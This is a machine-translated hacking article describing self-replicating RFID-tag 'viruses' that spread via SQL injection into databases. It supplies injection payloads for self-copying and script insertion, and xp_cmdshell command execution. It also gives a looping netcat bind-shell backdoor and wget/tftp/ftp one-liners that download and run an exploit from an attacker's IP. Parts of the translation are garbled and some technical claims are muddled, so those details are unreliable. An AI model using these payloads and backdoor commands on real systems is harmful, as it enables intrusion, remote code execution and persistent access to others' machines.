This page has been robot translated, sorry for typos if any. Original content here.

Virus in RFID hacking, structure.


In this article, an addition, on the topic of RFID-hacking. The basics and the beginning are set out in the first article at: From which we learned that RFID is a Radio Frequency IDentification method for remotely storing and receiving information by transmitting radio signals using devices called RFID tags.

{About parasites}

The main functions of the virus in this type of attack are self-copying, and execution of arbitrary code. For these purposes, the parasite usually uses a database. Details depend on the database that is being used. In general, you can distinguish two classes of viruses in this type of attack: the first uses arbitrary queries in the database, the second one is implemented using quines (special program).
The arbitrary code that a virus can execute depends on the mechanisms of the database response to SQL injections.

{SQL injection}

In administration systems, the method of querying RFID tags from the database is usually used, with the subsequent return of data, which in turn can be copied in the correct sequence. So copy the tags themselves if there are certain factors.

At the moment, you can consider two types of viruses, the first is a single request program and the second is the use of multiple requests.
The first type of virus, uses a minimum of space, and in its structure can not carry a combat load. And it is used only for input of already planned information into the database. A virus that uses multiple requests on the contrary is already created to infect the systems of autoindication, and entering malicious code or other combat load. Most often the second method is used, but for correct operation, this type of virus, it is required that some conditions in the database are properly observed, and this is to ensure the function of the function GetCurrentQuery-style, for access. This is necessary to avoid an error, because this API fitcha allows you to enter a comment. (I hasten to reassure you, these functions are initially included in the default systems)

Specific attacks can be performed when the database has made a query in the label, and it responded with such content
UPDATE ContainerContents SET OldContents = '% contents%' WHERE TagID = '% id%'

Here, the variables contents and id

If this request passes without errors, then the attacker can change the request at his discretion with the help of our favorite quote (''). And what can I do, ??? And this is to add just a single copy to the NewContents area and infect other systems in the same way.

Here's roughly what we need:
Apples', NewContents=SUBSTR(GetCurrentQuery (),43,57) – UPDATE ContainerContents SET OldContents='Apples', NewContents=SUBSTR(GetCurrentQuery (),43,57) -- WHERE TagId='123'
Instead of just updating the OldContents area, the query now also updates the NewContents scope. Using the SQL comment (-), all rows in the database will be moved. That opens up new possibilities for the attacker.

Inserting malicious code.

In the above-described injection technology, it is impossible to execute any code other than queries into the database. However, when enabled from the client side of the script, the server automatically becomes vulnerable. Scripts can be inserted after the comment, so that the database system ignores them.
The only thing that needs to be considered is that when you include the code in the exploit, you need to take into account the third parameter SUBSTR which should match the length of the exploit.
Apples', NewContents=SUBSTR(GetCurrentQuery (),43,73) --<script>...</script>
In a more serious version with the use of variables, and inserts not only some specific squeaks this will look like this:
Apples'; UPDATE ContainerContents SET NewContents=NewContents || ''';' || GetCurrentQuery () || ';%payload%; --';%payload% --
Here the malicious code should be worked twice, Ie for the first time, this is self-copying to the database, the second time is the fulfillment of oneself.

At the moment, the comment feature is present in Oracle (OCI / iSQL * Plus) This provides the functionality of the GetCurrentQuery-style, with subsequent administrator privileges.PostgreSQL, MySQL and SQL Server also allow comments and multiple injection requests. Here, too, the functionality of the GetCurrentQuery-style is present. However, for PostgreSQL and SQL Server, there are no reliable working viruses yet, everything was limited only by trial development.

{Some examples of malicious code being injected}

System management functions provided by databases can be used to cause problems. For example, the Microsoft SQL Server provides a CLOSE function that allows the database to be private from SQL.
Reading Data from the Database
UPDATE ContainerContents SET OldContents='%contents%' WHERE TagID='%id%' data in the query below can be used for direct queries to the database.
'|| (SELECT ...) ||'
In this case, the quotes execute an SQL injection and cause the data to be interpreted as a code. || the operator performs a sequence link, causing the result of the SELECT query to be added to the region in the database. A sequence connection operator is required, in order to nitrate the comment that is our favorite quotes.

{Execute Shell commands via SQL injection}

The SQL server provides an xp_cmdshell procedure that allows malicious and not very, commands to be executed.
EXEC Master..xp_cmdshell 'commands';

{Installing backdoors on the system}

To defuse the system, we need the following commands
netcat -lp1234|sh
where the 1234 port will be listened.

But here we are trapped by the danger of an established and properly configured firewall or brandmauer. And then there's the solution, run the code in an infinite loop, so that it works like a daemon, which in itself allows you to create a more advanced back-end.
screen -dmS t bash -c"while [ true ]; do netcat -lp1234|sh; done {Other features}

There are still useful features, for example wget. It's easy to download a file over the network, and store the file in the system.
wget http://ip/myexploit -O /tmp/myexploit; chmod +x /tmp/myexploit; /tmp/myexploit
wget is not normally available on Windows systems. In this case, you need to use tftp
tftp -i ip GET myexploit.exe & myexploit
You can also create a text file, as they say on the fly, using the echo function
echo anonymous & echo BIN & echo GET myexploit.exe & echo quit) > ftp.txt & ftp -s:ftp.txt ip & myexploit {Conclusion}

This article describes the penetration into a vulnerable system by means of programming RFID tags. Of course, of course, I must warn that all the material presented is only for reference. In view of the complexity of the implementation of technology, namely the creation of the label itself and programming it with malicious intent, it seems to me through a difficult for a common man. So I warn people who are knowledgeable but who are idle, do not check this information in practice.